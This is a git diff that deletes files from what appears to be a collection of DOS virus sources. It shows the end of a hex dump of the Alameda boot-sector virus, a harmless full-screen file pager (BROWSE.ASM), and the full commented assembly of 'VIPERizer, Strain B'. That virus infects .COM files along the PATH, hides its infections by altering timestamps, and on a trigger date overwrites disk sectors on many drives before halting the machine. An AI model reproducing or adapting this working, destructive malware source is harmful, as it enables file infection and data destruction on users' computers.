-;7CD0 FB 08 08 75 08 3C 17 74-11 3C 53 74 8F 89 1E {..u.<.t..{9.. -;7D20 FC F3 A4 8E D9 C7 06 64-00 52 7D 8C 0E 66 00 B8 |s$.YG.R}..f.8 -;7D30 40 00 8E D8 88 26 17 00-FF 06 13 00 1E B8 00 F0 @..X.&.....8.p -;7D4 8E D8 81 3E 02 E5 E4 21-1F 74 02 CD 19 EA 02 E5 .X.>.ed!.t.M.e -;7D50 00 F0 31 C0 8E D8 A1 10-04 A8 01 75 07 0E 07 E8 .p1@.X!..(.u.. -;7D60 EE FE CD 18 B9 04 00 51-B4 00 CD 13 72 0D B8 01 n~M.9..Q4.M.r.8 -;7D70 02 1E 07 BB 00 7C B9 01-00 C3 59 73 04 E2 E7 ...;.|9..M.Ys.bg -;780 EB DB 81 FF 56 34 75 05-EA 00 7C 00 00 BE 00 7C k[..V4u|..>.| -;7D90 B9 E6 00 89 F7 0E 07 FC-F3 A6 74 2D 26 FF 06 F8 9f..w..|t-&..x -;7DA0 7D BB 7A 7C BA 00 00 B5-27 B4 05 EB 02 72 1F 8E };z|:..5.k.r.. -;7DB0 C2 BB 00 7C B1 08 B8 01-03 CD 13 0E 07 72 0F B9 B;.|1.8....r.9 -;7DC0 01 00 B8 01 03 CD 13 72-05 BF 56 34 CD 19 E8 7F ..8..M.rV4M.h. 
-;7DD0 FE 26 FF 0E F8 7D EB B0-89 1E FA 7D A1 F8 7D BB ~&..x}k0}!x}; -;7DE0 40 00 8E DB A3 72 0E9-F7 FE 29 C9 E2 FE 80 EC @..[#r.iwIb~.l -;7DF0 01 75 F9 C3 27 00 08 02-1C 00 00 00 27 00 08 02 .uyC'.....'... -;---------------------------------------------------------------------; -End of commented code for the Alameda College Boot Infector Virus. \ No newline at end of file diff --git a/b/BROWSE (29).ASM b/b/BROWSE (29).ASM deleted file mode 100755 index 291e4f1..0000000 --- a/b/BROWSE (29).ASM +++ /dev/null 
@@ -1,454 +0,0 @@
-; BROWSE.ASM -- Full Screen File Pager
-; ====================================
-
-CSEG Segment
- Assume CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG
- Org 0080h
-Parameter Label Byte
- Org 0100h
-Entry: Jmp Begin
-
-; All Data
-; --------
-
- db 'ATTR='
-Attribute db 0 ; Current screen attribute
- db 'SHIFT='
-ShiftHoriz db 8 ; Horizontal shift screen default
-DosVersionFail db 'Requires DOS 2.0 or above$'
-NoSpaceFail db 'Not enough memory$'
-FileFail db 'File Not Found$'
-ScreenFail db 'Unsupported video mode$'
-Delimiters db 9,' ,;=/' ; Delimiters in parameter
-FileHandle dw ? ; Use for saving file handle
-WSMode db 0FFh ; AND value for non-WordStar mode
-LineLength db ? ; Length of line (from BIOS)
-NumberLines db 25,0 ; Number of lines (check EGA BIOS)
-ScreenSize dw ? ; Size of screen in bytes
-CheckRetrace db 1 ; Flag zero if EGA or MONO used
-Addr6845 dw ? ; Could use for retrace check
-ScreenAddr Label DWord ; Address of screen
-ScreenOff dw 0 ; Higher for non-page 0
-ScreenSeg dw 0B800h ; Set to B000h for Mono Mode 7
-ScreenStart dw ? ; Points within buffer
-EndOfFile dw ? ; Points within buffer
-FileOffset dw -1, -1 ; Address within file of buffer data
-HorizOffset dw 0 ; Horizontal offset for display
-RightMargin dw 0 ; Right margin for offset display
-Dispatch dw Home, Up, PgUp, Dummy, Left
- dw Dummy, Right, Dummy, End, Down, PgDn
-
-; Check DOS Version for 2.0 or above
-; ----------------------------------
-
-Begin: Cld ; All string directions forward
- Mov AH,30h
- Int 21h ; Get DOS Version Number
- Cmp AL,2 ; Check for 2.0 or later
- Jae DOSVerOK
- Mov DX,Offset DOSVersionFail
-ErrorExit: Mov AH,9 ; Write error message
- Int 21h
- Int 20h
-
-; Parse Command Line to get File Name and WordStar flag
-; -----------------------------------------------------
-
-DOSVerOK: Mov SI,1 + Offset Parameter ; Points to parameter
-NameSearch: Lodsb ; Get byte
- Cmp AL,13 ; Check if carriage return
- Jz NoFileFound ; If so, no file name
- Mov DI,Offset Delimiters ; String of delimiters
- Mov CX,5 ; Number of delimiters (no /)
- Repne Scasb ; See if a match
- Je NameSearch ; If a delimiter, keep looking
- Mov DX,SI ; Otherwise found file name
- Dec DX ; Points to beginning of it
-EndSearch: Lodsb ; Get next byte
- Cmp AL,13 ; See if carriage return
- Je GotFileEnd ; If so, we're all done
- Mov DI,Offset Delimiters ; String of delimiters
- Mov CX,6 ; Number (including /)
- Repne Scasb ; See if a match
- Jne EndSearch ; If not, still in file name
- Mov Byte Ptr [SI - 1],0 ; If so, mark end of file name
- Jcxz GotFlag ; If slash, check for W
- Jmp EndSearch ; Or continue flag search
-GotFlag: Lodsb ; Get byte after / flag
- Or AL,20h ; Uncapitalize
- Cmp AL,'w' ; See if w for WordStar mode
- Jnz GotFileEnd ; If not, just ignore it
- Mov [WSMode],7Fh ; AND value for WordStar
-
-; Open the File
-; -------------
-
-GotFileEnd: Mov Byte Ptr [SI - 1],0 ; Mark end of file name
- ; DX still points to name
- Mov AX,3D00h ; Open file for reading
- Int 21h ; by calling DOS
- Jnc GotTheFile ; If no error, continue
-NoFileFound: Mov DX,Offset FileFail ; Otherwise print a message
- Jmp ErrorExit
-GotTheFile: Mov [FileHandle],AX ; Save the file handle
-
-; Get Screen Mode Information from BIOS Data Area
-; -----------------------------------------------
-
- Push ES ; Save register
- Sub AX,AX
- Mov ES,AX ; Set ES to 0 (BIOS Data)
- Mov AL,ES:[0449h] ; Current Video Mode
- Cmp AL,3 ; Check if Color Alpha
- Jbe DisplayOK ; Continue if so
- Cmp AL,7 ; Check if monochrome display
- Je Monochrome ; If so, branch
- Mov DX,Offset ScreenFail ; We can't handle graphics
- Jmp ErrorExit ; So print an error message
-Monochrome: Mov [ScreenSeg],0B000h ; Use Monochrome Segment
- Mov [CheckRetrace],0 ; Don't have to check retrace
-DisplayOK: Mov AL,ES:[044Ah] ; Number of Columns
- Mov [LineLength],AL ; Save it
- Mov AX,ES:[044Eh] ; Offset into screen buffer
- Mov [ScreenOff],AX ; Save it
- Mov AX,ES:[0463h] ; Address of 6845 Regsiter
- Mov [Addr6845],AX ; Save it
- Push ES
- Sub DL,DL ; Set Rows to zero first
- Sub BH,BH
- Mov AX,1130h ; EGA BIOS: Get Information
- Int 10h
- Pop ES
- Or DL,DL ; Check if DL is still zero
- Jz NoEGA ; If so, skip rest of stuff
- Inc DL
- Mov [NumberLines],DL ; Save Number of Lines
- Test Byte Ptr ES:[0487h],4 ; Check if must check retrace
- Jnz NoEGA
- Mov [CheckRetrace],0 ; EGA says we don't have to
-NoEGA: Mov BH,ES:[0462h] ; Get Current Page (use later)
- Pop ES
- Mov AL,[LineLength] ; Length of each line
- Mul [NumberLines] ; Total chars on screen
- Add AX,AX ; Double for attributes
- Mov [ScreenSize],AX ; And Save it
-
-; See if enough memory is left
-; ----------------------------
-
- Add AX,Offset ScreenHold ; Add ScreenSize to code end
- Add AX,256 ; Add a little stack room
- Cmp AX,SP ; Check against stack pointer
- Jbe GotEnufMemory ; Continue if OK
- Mov DX,Offset NoSpaceFail ; Otherwise end program
- Jmp ErrorExit ; with error messae
-
-; Get Current Screen Attribute
-; ----------------------------
-
-GotEnufMemory: Cmp [Attribute],0 ; Check if attribute pre-set
- Jnz GotAttribute ; If so, move on
- Mov DL,' ' ; Write out a byte
- Mov AH,2 ; using DOS
- Int 21h
- Mov AL,8 ; Now backspace
- Mov AH,14 ; using BIOS call
- Int 10h
- Mov AH,8 ; Read character & attribute
- Int 10h ; using BIOS call (BH = pg)
- Mov [Attribute],AH ; And save attribute
-
-; Save Current Screen
-; -------------------
-
-GotAttribute: Mov DX,Offset Terminate ; Set Ctrl-Break exit
- Mov AX,2523h ; to terminate that way
- Int 21h
- Mov DI,Offset ScreenHold ; Destination of screen
- Mov CX,[ScreenSize] ; Size of screen
- Push DS ; Save Source Segment
- Lds SI,[ScreenAddr] ; Get screen address
- Rep Movsb ; Move in the bytes
- Pop DS ; Restore Source Segment
-
-; Get Keyboard Key and Decide on Action
-; -------------------------------------
-
- Call Home ; Read file in
- Mov [ScreenStart],SI ; Set buffer address
-KeyLoop: Call UpDateScreen ; Write file to screen
-GetKey: Mov AH,8 ; Get key
- Int 21h ; by calling DOS
- Cmp AL,27 ; Check if ESC
- Je Terminate ; If so, terminate
- Cmp AL,0 ; Check if extended
- Jnz GetKey ; If not, try again
- Mov AH,8 ; Get extended code
- Int 21h ; by calling DOS
- Sub AL,71 ; Subtract Home key value
- Jb GetKey ; If below that, not valid
- Cmp AL,(81 - 71) ; Check if above PgDn
- Ja GetKey ; If so, ignore it
- Sub AH,AH ; Zero out top byte
- Add AX,AX ; Double for word access
- Mov BX,AX ; Offset in dispatch table
- Mov SI,[ScreenStart] ; Set current buffer pointer
- Call [Dispatch + BX] ; Do the call
- Mov [ScreenStart],SI ; Set new buffer pointer
- Jmp KeyLoop ; And update the screen
-
-; Terminate -- Restore screen and close file
-; ------------------------------------------
-
-Terminate: Mov SI,Offset ScreenHold ; Address of Saved Screen
- Les DI,[ScreenAddr] ; Address of Display
- Mov CX,[ScreenSize] ; Number of characters
- Rep Movsb ; Move them back
- Mov BX,[FileHandle] ; Get File Handle
- Mov AH,3Eh ; Close File
- Int 21h
- Int 20h ; Terminate
-
-; Cursor Key Routines -- Home Key
-; -------------------------------
-
-Home: Sub BX,BX ; For zeroing out values
- Mov AX,[FileOffset] ; Check if read in file
- Or AX,[FileOffset + 2]
- Mov [FileOffset],BX ; Zero out file address
- Mov [FileOffset + 2],BX
- Mov [HorizOffset],BX ; Zero out horizontal offset
- Mov SI,Offset Buffer ; Reset buffer pointer
- Jz Dummy ; Skip file read if in already
- Mov DX,Offset Buffer ; Area to read file in
- Mov CX,32768 ; Number of bytes to read
- Call FileRead ; Read in file
-Dummy: Ret
-
-; Up and PgUp Keys
-; ----------------
-
-Up: Call GetPrevChar ; Get previous char in buffer
- Jc UpDone ; If none available, finish
-UpLoop: Call GetPrevChar ; Get previous char again
- Jc UpDone ; if none, we're done
- Cmp AL,10 ; Check if line feed
- Jnz UpLoop ; If not, try again
- Call GetNextChar ; Get char after line feed
-UpDone: Ret
-
-PgUp: Mov CX,Word Ptr [NumberLines] ; Number of lines
-PgUpLoop: Call Up ; Do UP that many times
- Loop PgUpLoop
- Ret
-
-; Left and Right Keys
-; -------------------
-
-Left: Mov [HorizOffset],0 ; Reset Horizontal Offset
- Ret
-
-Right: Mov AL,[ShiftHoriz] ; Get places to shift
- Sub AH,AH
- Add [HorizOffset],AX ; Move that many right
- Ret
-
-; End, Down, and PgDn Keys
-; ------------------------
-
-End: Mov BX,SI ; Save buffer pointer
- Call PgDn ; Go page down
- Cmp BX,SI ; Check if we did so
- Jnz End ; If so, do it again
- Ret
-
-Down: Call GetNextChar ; Get next character
- Jc NoMoreDown ; If no more, we're done
-DownLoop: Call GetNextChar ; Get one again
- Jc UpLoop ; If no more, find prev LF
- Cmp AL,10 ; See if line feed
- Jnz DownLoop ; If not, continue
-NoMoreDown: Ret
-
-PgDn: Mov CX,Word Ptr [NumberLines] ; Number of lines
-PgDnLoop: Call Down ; Do DOWN that many times
- Loop PgDnLoop
- Ret
-
-; Update Screen
-; -------------
-
-UpdateScreen: Push ES
- Mov SI,[ScreenStart] ; Address of data in buffer
- Les DI,[ScreenAddr] ; Address of display
- Mov CX,ScreenSize ; Number of bytes in screen
- Shr CX,1 ; Half for number of chars
- Mov AL,' ' ; Will blank screen
- Mov AH,[Attribute] ; With screen attribute
- Rep Stosw ; Blank it
- Mov AL,[LineLength] ; Length of display line
- Sub AH,AH
- Add AX,[HorizOffset] ; Add Horizontal Offset
- Mov [RightMargin],AX ; That's right display margin
- Sub DL,DL ; Line Number
-LineLoop: Sub BX,BX ; Column Number
- Mov AL,[LineLength] ; Use Line Length
- Mul DL ; and Line Number
- Add AX,AX ; to recalculate
- Mov DI,AX ; display destination
- Add DI,[ScreenOff] ; Add beginning address
-CharLoop: Call GetNextChar ; Get next character
- Jc EndOfScreen ; If no more, we're done
- And AL,[WSMode] ; Will be 7Fh for WordStar
- Cmp AL,13 ; Check for carriage return
- Je CharLoop ; Do nothing if so
- Cmp AL,10 ; Check for line feed
- Je LineFeed ; Do routine if so
- Cmp AL,9 ; Check for tab
- Je Tab ; Do routine if so
- Mov CX,1 ; Just 1 char to display
-PrintChar: Cmp BX,[HorizOffset] ; See if we can print it
- Jb NoPrint
- Cmp BX,[RightMargin] ; See if within margin
- Jae NoPrint
- Mov AH,[Attribute] ; Attribute for display
- Cmp [CheckRetrace],0 ; See if must stop snow
- Jz WriteIt ; If not, skip retrace wait
- Push BX
- Push DX
- Mov BX,AX ; Save character and attribute
- Mov DX,[Addr6845] ; Set up I/O address
- Add DX,6
-RetraceWait1: In AL,DX ; Check until
- Shr AL,1 ; vertical retrace
- Jc RetraceWait1 ; ends
- Cli ; Clear interrupts
-RetraceWait2: In AL,DX ; Check until
- Shr AL,1 ; vertical retrace
- Jnc RetraceWait2 ; begins
- Mov AX,BX ; Get back character & attr
- Stosw ; Write to display
- Sti ; Enable interrupts again
- Pop DX
- Pop BX
- Jmp Short NoPrint ; Skip around "no snow" write
-WriteIt: Stosw ; Write without retrace wait
-NoPrint: Inc BX ; Bump up line counter
- Loop PrintChar ; Do it CX times
- Jmp CharLoop ; Then go back to top
-Tab: Mov AX,BX ; Current column number
- And AX,07h ; Take lower three bits
- Mov CX,8
- Sub CX,AX ; Subtract from 8
- Mov AL,' ' ; Will print CX blanks
- Jmp PrintChar
-LineFeed: Inc DL ; Next line
- Cmp DL,[NumberLines] ; See if down at bottom
- Jb LineLoop ; If not, continue
-EndOfScreen: Pop ES ; All done -- leave
- Ret
-
-; Get Next Character from buffer
-; ------------------------------
-; (Input is SI pointing to buffer, Returns AL, CY if no more)
-
-GetNextChar: Cmp SI,[EndOfFile] ; See if at end of file
- Jae NoMoreNext ; If so, no more chars
- Cmp SI,Offset BufferEnd ; See if at end of buffer
- Jb CanGetNext ; If not, just get character
- Push CX ; Otherwise save registers
- Push DX
- Push DI
- Push ES
- Push DS ; Set ES to DS
- Pop ES ; (could be different)
- Mov SI,Offset BufferMid ; Move 2nd buffer half
- Mov DI,Offset Buffer ; to 1st buffer half
- Mov CX,16384
- Sub [ScreenStart],CX ; New buffer pointer
- Rep Movsb ; Move them
- Mov SI,DI ; SI also buffer pointer
- Add [FileOffset],32768 ; Adjust file addr to read
- Adc [FileOffset + 2],0
- Mov DX,Offset BufferMid ; Place to read file
- Mov CX,16384 ; Number of bytes
- Call FileRead ; Read the file
- Sub [FileOffset],16384 ; Now adjust so reflects
- Sbb [FileOffset + 2],0 ; 1st half of buffer
- Pop ES ; Get back registers
- Pop DI
- Pop DX
- Pop CX
- Jmp GetNextChar ; And try again to get char
-CanGetNext: Lodsb ; Get the character
-NoMoreNext: Cmc ; So CY set if no more
- Ret
-
-; Get Previous Character from buffer
-; ----------------------------------
-
-GetPrevChar: Cmp SI,Offset Buffer ; See if at top of buffer
- Ja CanGetPrev ; If not, just get character
- Mov AX,[FileOffset] ; See if at top of file
- Or AX,[FileOffset + 2]
- Jz AtTopAlready ; If so, can't get anymore
- Push CX ; Save some registers
- Push DX
- Mov SI,Offset Buffer ; Move 1st half of buffer
- Mov DI,Offset BufferMid ; to 2nd half of buffer
- Mov CX,16384
- Add [ScreenStart],CX ; New buffer pointer
- Rep Movsb ; Do the move
- Sub [FileOffset],16384 ; Adjust file addr for read
- Sbb [FileOffset + 2],0
- Mov DX,Offset Buffer ; Area to read file into
- Mov CX,16384 ; Number of bytes
- Call FileRead ; Read the file
- Pop DX ; Get back registers
- Pop CX
- Jmp Short CanGetPrev ; Now get character
-AtTopAlready: Stc ; CY flag set for no more
- Ret
-CanGetPrev: Dec SI ; Move pointer back
- Mov AL,[SI] ; Get the character
- Clc ; CY flag reset for success
- Ret
-
-; Read CX bytes from the file into DX buffer
-; ------------------------------------------
-
-FileRead: Push AX ; Save some registers
- Push BX
- Push CX
- Push DX
- Mov [EndOfFile],-1 ; Initialize this
- Mov DX,[FileOffset] ; Get file address to read
- Mov CX,[FileOffset + 2]
- Mov BX,[FileHandle] ; Get file Handle
- Sub AL,AL ; Do LSEEK from beginning
- Mov AH,42h ; LSEEK call
- Int 21h
- Pop DX ; Get back destination
- Pop CX ; Get back count
- Mov AH,3Fh ; Read file function call
- Int 21h
- Jnc NoReadError ; If no error, continue
- Sub AX,AX ; Otherwise read zero bytes
-NoReadError: Cmp AX,CX ; See if 32K has been read
- Je GotItAll ; If so, we're home free
- Add AX,DX ; Otherwise add to buffer addr
- Mov [EndOfFile],AX ; And save as end of file
-GotItAll: Pop BX
- Pop AX
- Ret
-
-; File Buffer and Screen Hold Areas
-; ---------------------------------
-
-Buffer Label Byte ; Area for file reads
-BufferMid equ Buffer + 16384 ; Halfway through it
-BufferEnd equ BufferMid + 16384 ; At end of it
-ScreenHold equ BufferEnd ; Area for holding screen
-CSEG EndS ; End of segment
- End Entry ; Denotes entry point
-
\ No newline at end of file
diff --git a/b/BUSH (30).ASM b/b/BUSH (30).ASM
deleted file mode 100755
index 087b3e9..0000000
--- a/b/BUSH (30).ASM
+++ /dev/null
@@ -1,413 +0,0 @@ -; -; VIPERizer, Strain B -; Copyright (c) 1992, Stingray/VIPER -; This is a Viral Inclined Programming Experts Ring Programming Team Production -; -; VIPER are: Stingray, Venom, and Guido Sanchez -; - -MOV_CX MACRO X ; Here is just a simple "mov cx,xxxx" macro. - DB 0B9H - DW X -ENDM - -CODE SEGMENT - ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE - ORG $+0100H - -VCODE: JMP virus - - NOP ; just a dud for the 'infected' file. - -v_start equ $ - - -virus: PUSH CX - mov ax,0ff0fh ; Thanks to RABID... Change Mem Marker - int 21h - cmp ax,101h ; Is VirexPC/FluShit in memory? - jne more_virus ; Nope. - jmp quit ; FUCK!!!!! -more_virus: - MOV DX,OFFSET vir_dat ;This is where the virus data starts. - ; The 2nd and 3rd bytes get modified. - CLD ;Pointers will be auto INcremented - MOV SI,DX ;Access data as offset from SI - ADD SI,first_3 ;Point to original 1st 3 bytes of .COM - MOV DI,OFFSET 100H ;`cause all .COM files start at 100H - mov cx,3 - REPZ MOVSB ;Restore original first 3 bytes of .COM - MOV SI,DX ;Keep SI pointing to the data area - - MOV AH,30H - INT 21H - nop - CMP AL,0 ;0 means it's version 1.X - JNZ dos_ok ;For version 2.0 or greater - JMP quit ;Don't try to infect version 1.X -dos_ok: - mov ah,2ch ; Get Time - int 21h ; Do it. - xor bx,bx ; VIPERize bx, for later use. - cmp dl,4 ; hund's of seconds 4? - jle print_message ; If 4 or less, print a message. - ; This serves as a random 1 in 20 - ; chance of the message printing - jmp short get_date ; No? What date is it...? -print_message: - mov dl, byte ptr [si+msg+bx] ; Get a byte of our message... - or dl,dl ; is it 0? (end of message) - jz get_date ; Get the date if it is... - sub dl,75 ; Unencrypt message - mov ah,2 ; Prepare to print one letter - int 21h ; do it! - inc bx ; point to next character. - jmp short print_message ; Do it again. -get_date: - mov ah,2ah ; What day is it? - int 21h ; Find out. - cmp dh,3 ; Is it february? - jne resume ; No? Oh well. - cmp dl,24 ; Is it valentines day? 
- jne resume ; No? Damn. - mov ah,2ch ; What time is it? - int 21h ; Find out. - cmp ch,7 ; Is it 7 hours? - jne resume ; No? C'est la vie... - cmp cl,45 ; Is it 45 minutes? - jne resume ; No? Too Bad... - xor bx,bx ; VIPERize bx -cool: - mov dl,byte ptr [si+msg2+bx] ; This is pretty much the - or dl,dl ; same as the above 'print' - jz no_mas ; function. except I didn't - sub dl,75 ; make it a procedure. - mov ah,2 - int 21h - inc bx - jmp short cool -no_mas: - mov al,0 ; Start with drive default -phri: - mov cx,255 ; Nuke a few sectors - mov dx,1 ; Beginning with sector 1!!! - int 26h ; VIPERize them!!!! Rah!!! - jc error ; Uh oh. Problem. - add sp,2 ; Worked great. Clear the stack... -error: - inc al ; Get another drive! - cmp al,200 ; Have we fried 200 drives? - je done_phrying ; Yep. - jmp short phri ; Nope. -done_phrying: - cli ; Disable Interrupts - hlt ; Lock up computer. -resume: - PUSH ES - MOV AH,2FH - INT 21H - nop - MOV [SI+old_dta],BX - MOV [SI+old_dts],ES ;Save the DTA address - POP ES - MOV DX,dta ;Offset of new DTA in virus data area - nop - ADD DX,SI ;Compute DTA address - MOV AH,1AH - INT 21H ;Set new DTA to inside our own code - nop - PUSH ES - PUSH SI - MOV ES,DS:2CH - MOV DI,0 ;ES:DI points to environment -find_path: - POP SI - PUSH SI ;Get SI back - ADD SI,env_str ;Point to "PATH=" string in data area - LODSB - nop - MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long - REPNZ SCASB ;Search for first character - MOV CX,4 -check_next_4: - LODSB - SCASB - JNZ find_path ;If not all there, abort & start over - nop - LOOP check_next_4 ;Loop to check the next character - POP SI - POP ES - nop - MOV [SI+path_ad],DI ;Save the address of the PATH - MOV DI,SI - ADD DI,wrk_spc ;File name workspace - nop - MOV BX,SI ;Save a copy of SI - ADD SI,wrk_spc ;Point SI to workspace - MOV DI,SI ;Point DI to workspace - JMP SHORT slash_ok -set_subdir: - CMP WORD PTR [SI+path_ad],0 ;Is PATH string ended? 
- JNZ found_subdir ;If not, there are more subdirectories - JMP all_done ;Else, we're all done -found_subdir: - PUSH DS - PUSH SI - MOV DS,ES:2CH ;DS points to environment segment - nop - MOV DI,SI - MOV SI,ES:[DI+path_ad] ;SI = PATH address - ADD DI,wrk_spc ;DI points to file name workspace -move_subdir: - LODSB ;Get character - CMP AL,';' ;Is it a ';' delimiter? - JZ moved_one ;Yes, found another subdirectory - nop - CMP AL,0 ;End of PATH string? - JZ moved_last_one ;Yes - STOSB ;Save PATH marker into [DI] - JMP SHORT move_subdir -moved_last_one: - xor si,si -moved_one: - POP BX ;Pointer to virus data area - POP DS ;Restore DS - MOV [BX+path_ad],SI ;Address of next subdirectory - NOP - CMP CH,'\' ;Ends with "\"? - nop - JZ slash_ok ;If yes - MOV AL,'\' ;Add one, if not - STOSB -slash_ok: - MOV [BX+nam_ptr],DI ;Set filename pointer to name workspace - MOV SI,BX ;Restore SI - ADD SI,f_spec ;Point to "*.COM" - MOV CX,6 - nop - REPZ MOVSB ;Move "*.COM",0 to workspace - MOV SI,BX - MOV AH,4EH - MOV DX,wrk_spc - ADD DX,SI ;DX points to "*.COM" in workspace - MOV CX,3 ;Attributes of Read Only or Hidden OK - INT 21H - nop - JMP SHORT find_first -find_next: - MOV AH,4FH - INT 21H - nop -find_first: - JNB found_file ;Jump if we found it - JMP SHORT set_subdir ;Otherwise, get another subdirectory -found_file: - MOV AX,[SI+dta_tim] ;Get time from DTA - AND AL,1FH ;Mask to remove all but seconds - CMP AL,1FH ;62 seconds -> already infected - JZ find_next ;If so, go find another file - CMP WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too long? - nop - JA find_next ;If too long, find another one - CMP WORD PTR [SI+dta_len],0AH ;Is it too short? 
- JB find_next ;Then go find another one - MOV DI,[SI+nam_ptr] ;DI points to file name - PUSH SI ;Save SI - ADD SI,dta_nam ;Point SI to file name -more_chars: - LODSB - STOSB - CMP AL,0 - JNZ more_chars ;Move characters until we find a 00 - POP SI - MOV AX,OFFSET 4300H - nop - MOV DX,wrk_spc ;Point to \path\name in workspace - ADD DX,SI - INT 21H - nop - MOV [SI+old_att],CX ;Save the old attributes - MOV AX,OFFSET 4301H ;Set attributes - AND CX,OFFSET 0FFFEH ;Set all except "read only" (weird) - nop - MOV DX,wrk_spc ;Offset of \path\name in workspace - ADD DX,SI ;Point to \path\name - INT 21H - nop - MOV AX,OFFSET 3D02H ;Read/Write - nop - MOV DX,wrk_spc ;Offset to \path\name in workspace - ADD DX,SI ;Point to \path\name - INT 21H - nop - JNB opened_ok ;If file was opened OK - JMP fix_attr ;If it failed, restore the attributes - -opened_ok: - MOV BX,AX - MOV AX,OFFSET 5700H - INT 21H - nop - MOV [SI+old_tim],CX ;Save file time - MOV [SI+ol_date],DX ;Save the date - MOV AH,3FH - nop - MOV CX,3 - MOV DX,first_3 - ADD DX,SI - INT 21H ;Save first 3 bytes into the data area - nop - JB fix_time_stamp ;Quit, if read failed - CMP AX,3 ;Were we able to read all 3 bytes? - JNZ fix_time_stamp ;Quit, if not - MOV AX,OFFSET 4202H - xor cx,cx - xor dx,dx - INT 21H - nop - JB fix_time_stamp ;Quit, if it didn't work - MOV CX,AX ;DX:AX (long int) = file size - SUB AX,3 ;Subtract 3 (OK, since DX must be 0, here) - MOV [SI+jmp_dsp],AX ;Save the displacement in a JMP instruction - nop - ADD CX,OFFSET c_len_y - MOV DI,SI ;Point DI to virus data area - SUB DI,OFFSET c_len_x - ;Point DI to reference vir_dat, at start of pgm - MOV [DI],CX ;Modify vir_dat reference:2nd, 3rd bytes of pgm - MOV AH,40H - MOV_CX virlen ;Length of virus, in bytes - nop - MOV DX,SI - SUB DX,OFFSET codelen ;Length of virus code, gives starting - ; address of virus code in memory - INT 21H - nop - JB fix_time_stamp ;Jump if error - CMP AX,OFFSET virlen ;All bytes written? 
- JNZ fix_time_stamp ;Jump if error - MOV AX,OFFSET 4200H - xor cx,cx - xor dx,dx - INT 21H - nop - JB fix_time_stamp ;Jump if error - MOV AH,40H - MOV CX,3 - nop - MOV DX,SI ;Virus data area - ADD DX,jmp_op ;Point to the reconstructed JMP - INT 21H - nop -fix_time_stamp: - MOV DX,[SI+ol_date] ;Old file date - nop - MOV CX,[SI+old_tim] ;Old file time - AND CX,OFFSET 0FFE0H - nop - OR CX,1FH ;Seconds = 31/30 min = 62 seconds - MOV AX,OFFSET 5701H - INT 21H - nop - MOV AH,3EH - INT 21H - nop -fix_attr: - MOV AX,OFFSET 4301H - MOV CX,[SI+old_att] ;Old Attributes - nop - MOV DX,wrk_spc - ADD DX,SI ;DX points to \path\name in workspace - INT 21H - nop -all_done: - PUSH DS - MOV AH,1AH - MOV DX,[SI+old_dta] - nop - MOV DS,[SI+old_dts] - INT 21H - nop - POP DS - nop -quit: - POP CX - XOR AX,AX - XOR BX,BX - xor cx,cx - XOR DX,DX - XOR SI,SI - MOV DI,OFFSET 0100H - PUSH DI - XOR DI,DI - RET 0FFFFH -vir_dat EQU $ -olddta_ DW 0 ;Old DTA offset -olddts_ DW 0 ;Old DTA segment -oldtim_ DW 0 ;Old Time -oldate_ DW 0 ;Old date -oldatt_ DW 0 ;Old file attributes -first3_ EQU $ - INT 20H - NOP -jmpop_ DB 0E9H ;Start of JMP instruction -jmpdsp_ DW 0 ;The displacement part -fspec_ DB '*.COM',0 -pathad_ DW 0 ;Path address -namptr_ DW 0 ;Pointer to start of file name -envstr_ DB 'PATH=' ;Find this in the environment -wrkspc_ DB 40h dup (0) -dta_ DB 16h dup (0) ;Temporary DTA goes here -dtatim_ DW 0,0 ;Time stamp in DTA -dtalen_ DW 0,0 ;File length in the DTA -dtanam_ DB 0Dh dup (0) ;File name in the DTA -reboot_ DB 0EAH,0F0H,0FFH,0FFH,0FFH ;Five byte FAR JMP to FFFF:FFF0 - -_msg db 158,186,189,189,196,107,191,179,180,190,107,174,186,184,187,192 - db 191,176,189,107,180,190,107,185,186,107,183,186,185,178,176,189 - db 107,186,187,176,189,172,191,180,186,185,172,183,107,175,192,176 - db 107,191,186,107,172,185,107,186,192,191,173,189,176,172,182,107 - db 186,177,088,141,192,190,179,180,190,179,180,189,186,088,147,172 - db 193,176,107,172,107,153,148,142,144,107,175,172,196,121,121,121 - 
db 088 - db 0 - -_msg2 db 161,148,155,144,157,180,197,176,189,119,107,158,191,189,172,180 - db 185,107,141,085,088 - db 115,174,116,107,124,132,132,125,119,107,158,191,180,185,178,189 - db 172,196,122,161,148,155,144,157,085,088 - db 147,172,187,187,196,107,161,172,183,176,185,191,180,185,176,190 - db 107,143,172,196,108,085,088 - db 0 - - -lst_byt EQU $ ;All lines that assemble into code are - ; above this one - -virlen = lst_byt - v_start ;Length, in bytes, of the entire virus -codelen = vir_dat - v_start ;Length of virus code, only -c_len_x = vir_dat - v_start - 2 ;Displacement for self-modifying code -c_len_y = vir_dat - v_start + 100H ;Code length + 100h, for PSP -old_dta = olddta_ - vir_dat ;Displacement to the old DTA offset -old_dts = olddts_ - vir_dat ;Displacement to the old DTA segment -old_tim = oldtim_ - vir_dat ;Displacement to old file time stamp -ol_date = oldate_ - vir_dat ;Displacement to old file date stamp -old_att = oldatt_ - vir_dat ;Displacement to old attributes -first_3 = first3_ - vir_dat ;Displacement-1st 3 bytes of old .COM -jmp_op = jmpop_ - vir_dat ;Displacement to the JMP opcode -jmp_dsp = jmpdsp_ - vir_dat ;Displacement to the 2nd 2 bytes of JMP -f_spec = fspec_ - vir_dat ;Displacement to the "*.COM" string -path_ad = pathad_ - vir_dat ;Displacement to the path address -nam_ptr = namptr_ - vir_dat ;Displacement to the filename pointer -env_str = envstr_ - vir_dat ;Displacement to the "PATH=" string -wrk_spc = wrkspc_ - vir_dat ;Displacement to the filename workspace -dta = dta_ - vir_dat ;Displacement to the temporary DTA -dta_tim = dtatim_ - vir_dat ;Displacement to the time in the DTA -dta_len = dtalen_ - vir_dat ;Displacement to the length in the DTA -dta_nam = dtanam_ - vir_dat ;Displacement to the name in the DTA -reboot = reboot_ - vir_dat ;Displacement to the 5 byte reboot code -msg = _msg - vir_dat ; Disp. to 1st msg -msg2 = _msg2 - vir_dat ; Disp. to 2nd msg - CODE ENDS -END VCODE - \ No newline at end of file 
diff --git a/c/C-A-D (32).ASM b/c/C-A-D (32).ASM
deleted file mode 100755
index 5831a94..0000000
--- a/c/C-A-D (32).ASM
+++ /dev/null
